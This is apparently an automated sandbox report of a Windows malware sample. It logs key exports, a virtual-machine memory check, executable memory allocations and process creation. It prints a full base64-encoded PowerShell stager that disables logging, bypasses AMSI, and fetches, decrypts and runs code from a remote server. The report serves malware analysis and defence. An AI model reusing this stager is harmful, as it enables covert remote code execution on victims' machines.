CryptExportKey Aug. 12, 2024, 11:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x05560148 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 11:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x05560148 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 11:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x05560148 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 11:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x05560148 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 11:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x05560148 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 12, 2024, 11:19 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x05560148 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Aug. 12, 2024, 11:19 a.m.		1	1	0

Performs some HTTP requests (1 event)

request

GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml

Allocates read-write-execute memory (usually to unpack itself) (50 out of 249 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Aug. 12, 2024, 11:19 a.m.	process_identifier: 2628 region_size: 2293760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028e0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 11:19 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ad0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 12, 2024, 11:19 a.m.	process_identifier: 2628 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 11:19 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 12, 2024, 11:19 a.m.	process_identifier: 2628 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 11:19 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02662000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 11:19 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02672000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 11:19 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ad1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 11:19 a.m.	process_identifier: 2628 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ad2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 11:19 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0269a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 11:19 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02673000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 11:19 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02674000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 11:19 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 11:19 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 11:19 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 11:19 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02692000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 11:19 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 11:19 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02675000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 11:19 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0269c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 11:19 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 11:19 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02676000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 11:19 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ac000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 11:19 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02693000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 11:19 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02694000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 11:19 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02695000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 11:19 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02696000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 11:19 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02697000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 11:19 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02698000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 11:19 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02699000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 11:19 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05030000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 11:19 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05031000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 11:19 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05032000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 11:19 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05033000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 11:19 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05034000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 11:19 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05035000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 11:19 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05036000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 11:19 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05037000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 11:19 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05038000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 11:19 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05039000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 11:19 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 11:19 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 11:19 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 11:19 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 11:19 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 11:19 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 11:19 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05040000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 11:19 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05041000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 11:19 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05042000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 11:19 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05043000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 12, 2024, 11:19 a.m.	process_identifier: 2628 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05044000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAFIAcwBJAG8AbgBUAGEAQgBMAGUALgBQAFMAVgBlAFIAcwBpAG8ATgAuAE0AYQBqAG8AUgAgAC0AZwBFACAAMwApAHsAJABCAGUAMgBFADMAPQBbAHIARQBGAF0ALgBBAFMAUwBlAE0AQgBsAFkALgBHAEUAVABUAFkAcABFACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AVQB0AGkAbABzACcAKQAuACIARwBFAFQARgBpAGUAYABMAGQAIgAoACcAYwBhAGMAaABlAGQARwByAG8AdQBwAFAAbwBsAGkAYwB5AFMAZQB0AHQAaQBuAGcAcwAnACwAJwBOACcAKwAnAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQA7AEkAZgAoACQAQgBFADIARQAzACkAewAkADgARgBBADEAYgA9ACQAYgBlADIARQAzAC4ARwBlAHQAVgBhAEwAdQBFACgAJABuAHUATABsACkAOwBJAGYAKAAkADgAZgBhADEAQgBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdACkAewAkADgARgBhADEAYgBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAA4AGYAYQAxAGIAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQBbACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnAF0APQAwAH0AJABWAGEAbAA9AFsAQwBPAEwATABFAGMAVABpAG8ATgBTAC4ARwBFAE4AZQBSAGkAQwAuAEQAaQBDAFQAaQBvAG4AQQByAHkAWwBTAHQAcgBJAG4AZwAsAFMAWQBTAHQARQBNAC4ATwBCAGoARQBjAHQAXQBdADoAOgBuAEUAdwAoACkAOwAkAFYAYQBMAC4AQQBkAGQAKAAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcALAAwACkAOwAkAFYAYQBsAC4AQQBkAEQAKAAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAbABvAGMAawBJAG4AdgBvAGMAYQB0AGkAbwBuAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAOABmAGEAMQBiAFsAJwBIAEsARQBZAF8ATABPAEMAQQBMAF8ATQBBAEMASABJAE4ARQBcAFMAbwBmAHQAdwBhAHIAZQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFAAbwB3AGUAcgBTAGgAZQBsAGwAXABTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAkAFYAQQBMAH0ARQBMAFMARQB7AFsAUwBDAFIAaQBwAFQAQgBsAG8AQwBLAF0ALgAiAEcARQB0AEYAaQBlAGAATABEACIAKAAnAHMAaQBnAG4AYQB0AHUAcgBlAHMAJwAsACcATgAnACsAJwBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAVABWAGEATABVAEUAKAAkAG4AdQBsAEwALAAoAE4AZQBXAC0ATwBCAEoARQBDAFQAIABDAG8ATABMAEUAQwBUAEkAbwBOAFMALgBHAEUATgBlAHIASQBDAC4ASABhAFMAaABTAEUAdABbAFMAVABSAEkAbgBnAF0AKQApAH0AJABSAEUAZgA9AFsAUgBFAEYAXQAuAEEAcwBzAGUATQBCAEwAeQAuAEcARQB0AFQAWQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpACcAKwAnAFUAdABpAGwAcwAnACkAOwAkAFIARQBGAC4ARwBlAHQARgBJAEUATABEACgAJwBhAG0AcwBpAEkAbgBpAHQARgAnACsAJwBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAEUAVABWAGEAbABVAGUAKAAkAE4AdQBsAGwALAAkAFQAcgBVAEUAKQA7AH0AOwBbAFMAeQBzAFQAZQBtAC4ATgBlAFQALgBTAEUAcgB2AEkAYwBFAFAATwBpAG4AVABNAEEAbgBBAEcARQByAF0AOgA6AEUAeABwAGUAYwB0ADEAMAAwAEMATwBuAHQASQBOAHUARQA9ADAAOwAkADEAYQA5ADMAMAA9AFsAUwBZAHMAdABlAG0ALgBUAGUAWAB0AC4ARQBuAGMATwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQBUAEIAWQB0AGUAUwAoACcAZAA0ACwAMABnAGsAQABbAFAAKgAhAC8AZgBzAHQAYQA6AGIANwBRAEIAaABsAFUARAByADYAeABFAF0AMwBfACcAKQA7ACQAUgA9AHsAJABEACwAJAAxAEEAOQAzADAAPQAkAEEAUgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkADEAQQA5ADMAMABbACQAXwAlACQAMQBBADkAMwAwAC4AQwBvAHUATgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAEIAeABPAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAaQBlAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AQwBPAE0AIABJAG4AdABlAHIAbgBlAHQARQB4AHAAbABvAHIAZQByAC4AQQBwAHAAbABpAGMAYQB0AGkAbwBuADsAJABpAGUALgBTAGkAbABlAG4AdAA9ACQAVAByAHUAZQA7ACQAaQBlAC4AdgBpAHMAaQBiAGwAZQA9ACQARgBhAGwAcwBlADsAJABmAGwAPQAxADQAOwAkAHMAZQByAD0AJAAoAFsAVABlAFgAVAAuAEUAbgBDAE8ARABpAE4AZwBdADoAOgBVAG4AaQBDAG8ARABlAC4ARwBFAHQAUwBUAFIAaQBuAEcAKABbAEMAbwBOAHYARQByAHQAXQA6ADoARgBSAE8AbQBCAEEAUwBlADYANABTAHQAUgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA0AEEARABrAEEATABnAEEAeABBAEQAawBBAE4AdwBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAeABBAEQAWQBBAE8AZwBBADMAQQBEAGcAQQBNAFEAQQB3AEEAQQA9AD0AJwApACkAKQA7ACQAdAA9ACcALwBuAGUAdwBzAC4AcABoAHAAJwA7ACQAYwA9ACIAQwBGAC0AUgBBAFkAOgAgAGIAJwBOAFAAMwA3AFoAUQBvADAAZgBTAFEAagBMAHkAQgBjAHUAVABmAE8AMAAxADEAdwB1ADYANAA9ACcAIgA7ACQAaQBlAC4AbgBhAHYAaQBnAGEAdABlADIAKAAkAHMAZQByACsAJAB0ACwAJABmAGwALAAwACwAJABOAHUAbABsACwAJABjACkAOwB3AGgAaQBsAGUAKAAkAGkAZQAuAGIAdQBzAHkAKQB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0ATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAIAAxADAAMAB9ADsAJABoAHQAIAA9ACAAJABpAGUALgBkAG8AYwB1AG0AZQBuAHQALgBHAGUAdABUAHkAcABlACgAKQAuAEkAbgB2AG8AawBlAE0AZQBtAGIAZQByACgAJwBiAG8AZAB5ACcALAAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQgBpAG4AZABpAG4AZwBGAGwAYQBnAHMAXQA6ADoARwBlAHQAUAByAG8AcABlAHIAdAB5ACwAIAAkAE4AdQBsAGwALAAgACQAaQBlAC4AZABvAGMAdQBtAGUAbgB0ACwAIAAkAE4AdQBsAGwAKQAuAEkAbgBuAGUAcgBIAHQAbQBsADsAdAByAHkAIAB7ACQAZABhAHQAYQA9AFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGgAdAApAH0AIABjAGEAdABjAGgAIAB7ACQATgB1AGwAbAB9ACQASQB2AD0AJABkAEEAdABBAFsAMAAuAC4AMwBdADsAJABkAGEAVABBAD0AJABkAGEAdABhAFsANAAuAC4AJABEAGEAVABBAC4AbABlAE4ARwB0AGgAXQA7AC0AagBvAEkAbgBbAEMAaABBAHIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAVABBACAAKAAkAEkAVgArACQAMQBhADkAMwAwACkAKQAgAHwAIABJAEUAWAA=

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAFIAcwBJAG8AbgBUAGEAQgBMAGUALgBQAFMAVgBlAFIAcwBpAG8ATgAuAE0AYQBqAG8AUgAgAC0AZwBFACAAMwApAHsAJABCAGUAMgBFADMAPQBbAHIARQBGAF0ALgBBAFMAUwBlAE0AQgBsAFkALgBHAEUAVABUAFkAcABFACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AVQB0AGkAbABzACcAKQAuACIARwBFAFQARgBpAGUAYABMAGQAIgAoACcAYwBhAGMAaABlAGQARwByAG8AdQBwAFAAbwBsAGkAYwB5AFMAZQB0AHQAaQBuAGcAcwAnACwAJwBOACcAKwAnAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQA7AEkAZgAoACQAQgBFADIARQAzACkAewAkADgARgBBADEAYgA9ACQAYgBlADIARQAzAC4ARwBlAHQAVgBhAEwAdQBFACgAJABuAHUATABsACkAOwBJAGYAKAAkADgAZgBhADEAQgBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdACkAewAkADgARgBhADEAYgBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAA4AGYAYQAxAGIAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQBbACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnAF0APQAwAH0AJABWAGEAbAA9AFsAQwBPAEwATABFAGMAVABpAG8ATgBTAC4ARwBFAE4AZQBSAGkAQwAuAEQAaQBDAFQAaQBvAG4AQQByAHkAWwBTAHQAcgBJAG4AZwAsAFMAWQBTAHQARQBNAC4ATwBCAGoARQBjAHQAXQBdADoAOgBuAEUAdwAoACkAOwAkAFYAYQBMAC4AQQBkAGQAKAAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAJwArACcAbABv